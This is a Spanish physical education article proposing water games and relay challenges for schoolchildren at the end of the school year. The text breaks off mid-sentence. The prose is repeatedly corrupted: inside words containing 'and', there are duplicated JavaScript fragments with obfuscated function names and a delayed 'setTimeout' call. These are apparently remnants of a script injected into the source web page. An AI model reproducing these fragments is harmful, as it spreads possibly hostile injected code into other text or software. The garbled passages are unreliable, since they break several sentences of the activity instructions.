JUEGOS CON AGUA EN EDUCACIÓN FÍSICA

Autora: Laura Márquez Benavides

         En este artículo voy a proponer una actividad que consiste en dinámicas y juegos de agua. Puede ser llevada a cabo a final de curso como despedida del período escolar y de bienvenida a las vacaciones, un día muy caluroso del mes de junio ya que llegan  a mojarse y jugar con el agua.


         Formamos grupos de 5 o 6 alumnos. Cada grupo será diferenciado por un color y para ello llevarán una pulsera cada componente del equipo del color asignado.


         La primera prueba comenzará eligiendo al más pequeño del grupo. A este se le tapará los ojos con un pañuelo o bufandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda para que no vea nada. Con un punzón o un palillo alargado deberá pinchar los globos de agua que se encuentran colgados de una cuerda. De los 6 globos colgados  uno de ellos contendrá un papel plastificado con una imagen. Por ejemplo;


 -          Equipo  rojo: imagen portería.

-          Equipo azul: imagen arenero

-          Equipo amarillo parque

-          Equipo verde: imagen fuente

-          Equipo blanco: canasta

        La imagen le llevará al lugar para iniciar la  prueba. Cada monitor le indicará el desarrollo de la actividad.

         Una vez realizada la primera prueba y superada. El monitor les dará el resto de las imágenes donde se encuentran las pruebas. Una vez que encuentren el lugar y monitor le deberán dar la pieza a este para así ir descartandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las pruebas.


Prueba 1

         Los niños deberán quitarse un zapato. Colocados en fila con el zapato en la mano. El primero de ellos deberá colocarse de espaldas a un barreño lleno de agua colocado a 5 metros. Visualizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando y calculandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la distancia  deberán lanzar el zapato   por entre sus  piernas   y encestar en el barreño. La prueba es superada cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando todos hayan encestado sus respectivos zapatos.


 

Prueba 2

         Colocamos un barreño lleno de agua y junto al barreño de agua se encontrarán 5 vasos de plástico agujereados. A 10 metros colocamos una botella de 2 litros de agua vacía.  Por otro lado, colocamos una mesa con 8 vasos de plástico agujereado y pajitas


         A la señal, cada componente del equipo deberá dirigirse al barreño de agua, coger un vaso agujereado llenarlo de agua y trasladarlo para introducir el agua en la botella vacía de 2 litros. El vaso deberán cogerlo por los bordes. No pueden tapar los agujeros con sus manos.  Una vez que han llenado la botella de agua,  deberán coger cada niño la pajita y mediante sorbos llenar la pajita, mantener el agua en ella y vaciarla en los 8 vasos de agua. La prueba será superada cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}